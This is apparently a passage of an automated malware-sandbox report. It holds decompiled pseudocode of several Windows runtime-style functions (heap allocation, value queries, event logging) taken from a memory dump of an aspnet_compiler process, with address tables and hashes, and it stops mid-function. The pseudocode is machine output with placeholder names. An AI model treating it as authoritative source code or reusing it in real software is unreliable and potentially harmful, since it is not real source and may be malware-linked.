                                                                                        0x011f9b16
                                                                                        0x011a86d6
                                                                                        0x011a85f6
                                                                                        0x011a85f6
                                                                                        0x011a85f9
                                                                                        0x011a8602
                                                                                        0x011a8606
                                                                                        0x011a860a
                                                                                        0x011a860b
                                                                                        0x011a860e
                                                                                        0x011a8611
                                                                                        0x00000000
                                                                                        0x011a8611
                                                                                        0x011a85f3
                                                                                        0x00000000
                                                                                        0x011a85f3
                                                                                        0x011a8619
                                                                                        0x011a861e
                                                                                        0x011a861e
                                                                                        0x011a8621
                                                                                        0x011a8622
                                                                                        0x011a8623
                                                                                        0x011a8625
                                                                                        0x011a862c
                                                                                        0x00000000
                                                                                        0x011a873d
                                                                                        0x00000000
                                                                                        0x011a873d
                                                                                        0x011a8737
                                                                                        0x011a850f
                                                                                        0x011a8512
                                                                                        0x00000000
                                                                                        0x011a8512
                                                                                        0x00000000
                                                                                        0x011a84d6

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99715fad7fd42c6adb448eddc7700aa9fd6564060ef64d0a9d8cdf4205da292e
                                                                                        • Instruction ID: d8de13ec120e50182952e7e1db1693dd374be340bd360d9df0ac3f2b2080c0e8
                                                                                        • Opcode Fuzzy Hash: 99715fad7fd42c6adb448eddc7700aa9fd6564060ef64d0a9d8cdf4205da292e
                                                                                        • Instruction Fuzzy Hash: D5B16CB4E0024ADFDB1DDFD9C984AADBFB5BF44308F50412DE505AB285D770A945CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119C600 Relevance: .2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E0119C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x128d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E011A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E011DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1287b9c; // 0x0
					_t74 = L011B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E011D9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L011B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E011DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E011D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L011B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E011D9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                        0x0119c608
                                                                                        0x0119c615
                                                                                        0x0119c625
                                                                                        0x0119c62d
                                                                                        0x0119c635
                                                                                        0x0119c640
                                                                                        0x0119c680
                                                                                        0x0119c687
                                                                                        0x0119c688
                                                                                        0x0119c689
                                                                                        0x0119c694
                                                                                        0x0119c694
                                                                                        0x0119c642
                                                                                        0x0119c64a
                                                                                        0x0119c697
                                                                                        0x01207a25
                                                                                        0x01207a2b
                                                                                        0x01207a2e
                                                                                        0x01207a30
                                                                                        0x01207bea
                                                                                        0x01207bea
                                                                                        0x00000000
                                                                                        0x01207bea
                                                                                        0x01207a36
                                                                                        0x01207a43
                                                                                        0x01207a48
                                                                                        0x01207a4c
                                                                                        0x01207a4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207a58
                                                                                        0x01207a5a
                                                                                        0x01207a5b
                                                                                        0x01207a5c
                                                                                        0x01207a5d
                                                                                        0x01207a63
                                                                                        0x01207a64
                                                                                        0x01207a6a
                                                                                        0x01207a6c
                                                                                        0x01207a6e
                                                                                        0x012079cb
                                                                                        0x012079cb
                                                                                        0x012079ce
                                                                                        0x012079d0
                                                                                        0x01207a98
                                                                                        0x01207a9b
                                                                                        0x01207a9b
                                                                                        0x01207a9e
                                                                                        0x01207aa1
                                                                                        0x01207bbe
                                                                                        0x01207bbe
                                                                                        0x01207bc0
                                                                                        0x01207be0
                                                                                        0x01207be0
                                                                                        0x01207a01
                                                                                        0x01207a01
                                                                                        0x01207a05
                                                                                        0x01207a07
                                                                                        0x01207a15
                                                                                        0x01207a15
                                                                                        0x01207a1a
                                                                                        0x00000000
                                                                                        0x01207a1a
                                                                                        0x01207bc2
                                                                                        0x01207bc6
                                                                                        0x01207bc9
                                                                                        0x01207bcd
                                                                                        0x01207bcf
                                                                                        0x012079e6
                                                                                        0x012079e6
                                                                                        0x012079eb
                                                                                        0x012079eb
                                                                                        0x012079ef
                                                                                        0x012079f1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012079f3
                                                                                        0x012079f5
                                                                                        0x012079ff
                                                                                        0x012079ff
                                                                                        0x00000000
                                                                                        0x012079ff
                                                                                        0x012079f7
                                                                                        0x012079fd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012079fd
                                                                                        0x01207bd5
                                                                                        0x01207bd8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207ba9
                                                                                        0x01207bac
                                                                                        0x01207bb0
                                                                                        0x01207bb1
                                                                                        0x01207bb1
                                                                                        0x01207bb6
                                                                                        0x00000000
                                                                                        0x01207bb6
                                                                                        0x01207aa7
                                                                                        0x01207aaa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207ab2
                                                                                        0x01207ab3
                                                                                        0x01207ab5
                                                                                        0x01207aec
                                                                                        0x01207aef
                                                                                        0x01207b25
                                                                                        0x01207b28
                                                                                        0x01207b62
                                                                                        0x01207b64
                                                                                        0x01207b8f
                                                                                        0x01207b92
                                                                                        0x01207b96
                                                                                        0x01207b98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207b9e
                                                                                        0x01207b9f
                                                                                        0x01207ba3
                                                                                        0x00000000
                                                                                        0x01207ba3
                                                                                        0x01207b66
                                                                                        0x01207b68
                                                                                        0x01207ae2
                                                                                        0x01207ae2
                                                                                        0x00000000
                                                                                        0x01207ae2
                                                                                        0x01207b6e
                                                                                        0x01207b72
                                                                                        0x01207b75
                                                                                        0x01207b81
                                                                                        0x01207b85
                                                                                        0x01207b87
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207b31
                                                                                        0x01207b34
                                                                                        0x01207b3c
                                                                                        0x01207b45
                                                                                        0x01207b46
                                                                                        0x01207b4f
                                                                                        0x01207b51
                                                                                        0x01207b57
                                                                                        0x01207b59
                                                                                        0x01207b59
                                                                                        0x00000000
                                                                                        0x01207b59
                                                                                        0x01207b77
                                                                                        0x00000000
                                                                                        0x01207b77
                                                                                        0x01207b2a
                                                                                        0x00000000
                                                                                        0x01207b2a
                                                                                        0x01207af1
                                                                                        0x01207af3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207afb
                                                                                        0x01207afc
                                                                                        0x01207afe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207b00
                                                                                        0x01207b03
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207b05
                                                                                        0x01207b09
                                                                                        0x01207b0d
                                                                                        0x01207b0f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207b18
                                                                                        0x01207b1d
                                                                                        0x00000000
                                                                                        0x01207b1d
                                                                                        0x01207ab7
                                                                                        0x01207ab9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207abf
                                                                                        0x01207ac1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207ac3
                                                                                        0x01207ac6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207ac8
                                                                                        0x01207acc
                                                                                        0x01207ad0
                                                                                        0x01207ad2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207adb
                                                                                        0x00000000
                                                                                        0x01207adb
                                                                                        0x012079d6
                                                                                        0x012079d9
                                                                                        0x012079dc
                                                                                        0x01207a91
                                                                                        0x01207a94
                                                                                        0x00000000
                                                                                        0x01207a94
                                                                                        0x012079e2
                                                                                        0x00000000
                                                                                        0x012079e2
                                                                                        0x01207a74
                                                                                        0x01207a7a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207a8a
                                                                                        0x01207a21
                                                                                        0x01207a21
                                                                                        0x00000000
                                                                                        0x01207a21
                                                                                        0x0119c650
                                                                                        0x0119c651
                                                                                        0x0119c656
                                                                                        0x0119c65c
                                                                                        0x0119c65d
                                                                                        0x0119c663
                                                                                        0x0119c664
                                                                                        0x0119c66a
                                                                                        0x0119c66e
                                                                                        0x012079c5
                                                                                        0x012079c7
                                                                                        0x00000000
                                                                                        0x012079c7
                                                                                        0x0119c67a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8efa600066c253a0c4cf20a2be892c3b4bd13c13a7e3106d8d6438ec86389a5f
                                                                                        • Instruction ID: 86b4cb10856f4c0c247827de1d9f4fe9e9ce24315d5859cc214892417a431ffa
                                                                                        • Opcode Fuzzy Hash: 8efa600066c253a0c4cf20a2be892c3b4bd13c13a7e3106d8d6438ec86389a5f
                                                                                        • Instruction Fuzzy Hash: A281B4756246069BDB27CE58C881B6B77A4FB84354F14461AEEC58B282E330FD41C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0122B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 39%
                                                                                        			E0122B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1287b9c; // 0x0
				_t124 = L011B4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E011D9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E011D95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E011D95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L011B77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E011D9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E011D95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1287b9c; // 0x0
									_t92 = L011B4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E011D9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0119A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0122E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0122E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E011D95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                        0x0122b8d9
                                                                                        0x0122b8e4
                                                                                        0x00000000
                                                                                        0x0122b8e6
                                                                                        0x0122b8f3
                                                                                        0x0122b8f5
                                                                                        0x0122b8f5
                                                                                        0x0122b8f8
                                                                                        0x0122b920
                                                                                        0x0122b924
                                                                                        0x0122b936
                                                                                        0x0122b939
                                                                                        0x0122b93d
                                                                                        0x0122b948
                                                                                        0x0122b9a0
                                                                                        0x0122b9a0
                                                                                        0x0122b9a4
                                                                                        0x0122b9bf
                                                                                        0x0122b9c4
                                                                                        0x0122b9c6
                                                                                        0x0122b9cd
                                                                                        0x0122b9d1
                                                                                        0x0122bad4
                                                                                        0x0122bad8
                                                                                        0x0122bada
                                                                                        0x0122badc
                                                                                        0x0122badc
                                                                                        0x0122badf
                                                                                        0x0122bae0
                                                                                        0x0122bae2
                                                                                        0x0122bae4
                                                                                        0x0122baec
                                                                                        0x0122baee
                                                                                        0x0122baf0
                                                                                        0x0122baf0
                                                                                        0x0122baec
                                                                                        0x0122bafb
                                                                                        0x0122bafc
                                                                                        0x0122bafe
                                                                                        0x0122bb01
                                                                                        0x0122bb01
                                                                                        0x00000000
                                                                                        0x0122bb06
                                                                                        0x0122b9d7
                                                                                        0x0122b9db
                                                                                        0x0122b9db
                                                                                        0x0122b9de
                                                                                        0x0122b9de
                                                                                        0x0122b9e4
                                                                                        0x0122b9e7
                                                                                        0x0122b9ea
                                                                                        0x0122b9ec
                                                                                        0x0122b9ef
                                                                                        0x0122b9f3
                                                                                        0x0122ba1b
                                                                                        0x0122ba1b
                                                                                        0x0122ba23
                                                                                        0x0122ba24
                                                                                        0x0122ba27
                                                                                        0x0122ba2a
                                                                                        0x0122ba2b
                                                                                        0x0122ba2e
                                                                                        0x0122ba30
                                                                                        0x0122ba37
                                                                                        0x0122ba3f
                                                                                        0x0122ba9c
                                                                                        0x0122baa2
                                                                                        0x0122bb13
                                                                                        0x0122bb15
                                                                                        0x0122baae
                                                                                        0x0122baae
                                                                                        0x0122bab3
                                                                                        0x0122bab5
                                                                                        0x0122baba
                                                                                        0x0122bac8
                                                                                        0x0122bac8
                                                                                        0x0122baba
                                                                                        0x0122bacd
                                                                                        0x0122bacf
                                                                                        0x00000000
                                                                                        0x0122bacf
                                                                                        0x0122bb1a
                                                                                        0x00000000
                                                                                        0x0122bb1c
                                                                                        0x0122baa7
                                                                                        0x0122bb11
                                                                                        0x00000000
                                                                                        0x0122bb11
                                                                                        0x0122baa9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0122ba41
                                                                                        0x0122ba41
                                                                                        0x0122ba41
                                                                                        0x0122ba58
                                                                                        0x0122ba5d
                                                                                        0x0122ba62
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0122ba64
                                                                                        0x0122ba67
                                                                                        0x0122ba68
                                                                                        0x0122ba69
                                                                                        0x0122ba6c
                                                                                        0x0122ba6f
                                                                                        0x0122ba71
                                                                                        0x0122ba78
                                                                                        0x0122ba80
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0122ba90
                                                                                        0x0122ba90
                                                                                        0x0122ba97
                                                                                        0x00000000
                                                                                        0x0122ba97
                                                                                        0x0122b9f5
                                                                                        0x0122b9f7
                                                                                        0x0122b9f7
                                                                                        0x0122b9fa
                                                                                        0x0122ba03
                                                                                        0x0122ba07
                                                                                        0x0122ba0c
                                                                                        0x0122ba10
                                                                                        0x0122ba17
                                                                                        0x00000000
                                                                                        0x0122b9f7
                                                                                        0x0122b9a6
                                                                                        0x0122b9a8
                                                                                        0x0122b9af
                                                                                        0x0122b9b3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0122b9b9
                                                                                        0x00000000
                                                                                        0x0122b9b9
                                                                                        0x0122b94d
                                                                                        0x0122b98f
                                                                                        0x0122b995
                                                                                        0x0122b999
                                                                                        0x0122b960
                                                                                        0x0122b967
                                                                                        0x0122b968
                                                                                        0x0122b96a
                                                                                        0x00000000
                                                                                        0x0122b96a
                                                                                        0x0122b99b
                                                                                        0x0122b99e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0122b99e
                                                                                        0x0122b951
                                                                                        0x0122b954
                                                                                        0x0122b95a
                                                                                        0x0122b95e
                                                                                        0x0122b972
                                                                                        0x0122b979
                                                                                        0x0122b97d
                                                                                        0x0122b97f
                                                                                        0x0122b980
                                                                                        0x0122b982
                                                                                        0x0122b984
                                                                                        0x00000000
                                                                                        0x0122b984
                                                                                        0x00000000
                                                                                        0x0122b926
                                                                                        0x00000000
                                                                                        0x0122b926

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 104edc20137323bf2c9d6827ea52e3281c39e37dc5a637a6bc1b776f5aec50c1
                                                                                        • Instruction ID: 7aef2a2384e71d9cad831149328a160b97ebcd4d6b7235e4496e44fb9b343145
                                                                                        • Opcode Fuzzy Hash: 104edc20137323bf2c9d6827ea52e3281c39e37dc5a637a6bc1b776f5aec50c1
                                                                                        • Instruction Fuzzy Hash: 0A711132220B16BFE736DF18C845F6ABBA5EB44724F144928E7558B6E0EB71E940CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01216DC9 Relevance: .2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E01216DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01216B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E011B7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E011D9AE0();
					_t87 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0121795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0121795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0121795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0121795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L011B4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01216B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
